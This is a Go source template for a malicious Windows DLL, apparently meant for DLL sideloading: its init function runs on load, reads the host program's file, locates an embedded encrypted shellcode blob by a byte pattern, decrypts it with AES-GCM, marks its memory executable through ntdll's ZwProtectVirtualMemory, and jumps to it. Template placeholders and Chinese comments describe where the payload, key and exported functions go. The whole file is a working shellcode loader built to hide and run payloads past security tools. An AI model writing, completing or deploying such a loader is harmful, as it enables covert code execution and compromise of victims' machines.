package main

import "C"

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/binary"
	"encoding/hex"
	"io/ioutil"
	filepath2 "path/filepath"
	"syscall"
	"unsafe"
)

const (
	PAGE_EXECUTE_READ uintptr = 0x20
	// AESKeySize - Always use 256 bit keys
	AESKeySize = 16
	// GCMNonceSize - 96 bit nonces for GCM
	GCMNonceSize = 12
)

func xorEncode(data []byte, p []byte) []byte {
	l := len(p) - 1
	l2 := len(data)
	var data2 []byte = make([]byte, l2)
	for i := 0; i < l2; i++ {
		data2[i] = data[i] ^ p[i%l]
	}
	return data2
}

func RUN(buf []byte) {
	var hProcess uintptr = 0
	var pBaseAddr = uintptr(unsafe.Pointer(&buf[0]))
	var dwBufferLen = uint(len(buf))
	var dwOldPerm uint32

	ntdll := syscall.NewLazyDLL("ntdll")                              // ntdll
	ZwProtectVirtualMemory := ntdll.NewProc("ZwProtectVirtualMemory") // ZwProtectVirtualMemory
	ZwProtectVirtualMemory.Call(hProcess-1,
		uintptr(unsafe.Pointer(&pBaseAddr)),
		uintptr(unsafe.Pointer(&dwBufferLen)),
		PAGE_EXECUTE_READ,
		uintptr(unsafe.Pointer(&dwOldPerm)))

	syscall.Syscall(
		uintptr(unsafe.Pointer(&buf[0])),
		0, 0, 0, 0,
	)
}

func searchShellcode(data []byte, pattern []byte) []byte {
	// pattern的组成，4byte长度(长度xor解密) + shellcode前12位
	for i := 0; i < len(data); i++ {
		if data[i] != pattern[0] {
			continue
		}
		isMatch := true
		for j := 0; j < len(pattern); j++ {
			if data[i+j] != pattern[j] {
				isMatch = false
				break
			}
		}
		if isMatch {
			byteBuffer := bytes.NewBuffer(data[i : i+4])
			var length uint32
			err := binary.Read(byteBuffer, binary.LittleEndian, &length)
			if err != nil {
				panic(err)
			}
			return data[i+4 : i+4+int(length)]
		}
	}
	return nil
}

// AESKey - 128 bit key
type AESKey [AESKeySize]byte

// FromBytes - Creates an AESKey from bytes
func (AESKey) FromBytes(data []byte) AESKey {
	var key AESKey
	copy(key[:], data[:AESKeySize])
	return key
}

// GCMDecrypt - Decrypt GCM ciphertext
func GCMDecrypt(key AESKey, ciphertext []byte) ([]byte, error) {
	block, _ := aes.NewCipher(key[:])
	aesgcm, _ := cipher.NewGCM(block)
	plaintext, err := aesgcm.Open(nil, ciphertext[:GCMNonceSize], ciphertext[GCMNonceSize:], nil)
	if err != nil {
		return nil, err
	}
	return plaintext, nil
}

func init() {
	var MainProgram string = ("{{MainProgram}}")           // 主程序名称
	var PATTERNString string = ("{{PATTERNString}}")       // 搜索shellcode的规则
	var DecryptKeyString string = ("{{DecryptKeyString}}") // shellcode解密的key
	PATTERN, err := hex.DecodeString(PATTERNString)
	if err != nil {
		panic(err)
	}
	DecryptKey, err := hex.DecodeString(DecryptKeyString)
	if err != nil {
		panic(err)
	}
	filepath, err := filepath2.Abs(MainProgram)
	if err != nil {
		panic(err)
	}
	content, err := ioutil.ReadFile(filepath)
	if err != nil {
		panic(err)
	}
	encryShellcode := searchShellcode(content, PATTERN)
	var key AESKey
	key = key.FromBytes(DecryptKey)
	shellcode, err := GCMDecrypt(key, encryShellcode)
	if err != nil {
		panic(err)
	}
	RUN(shellcode)
}

{{exportFuncs}}
func main()                    {}
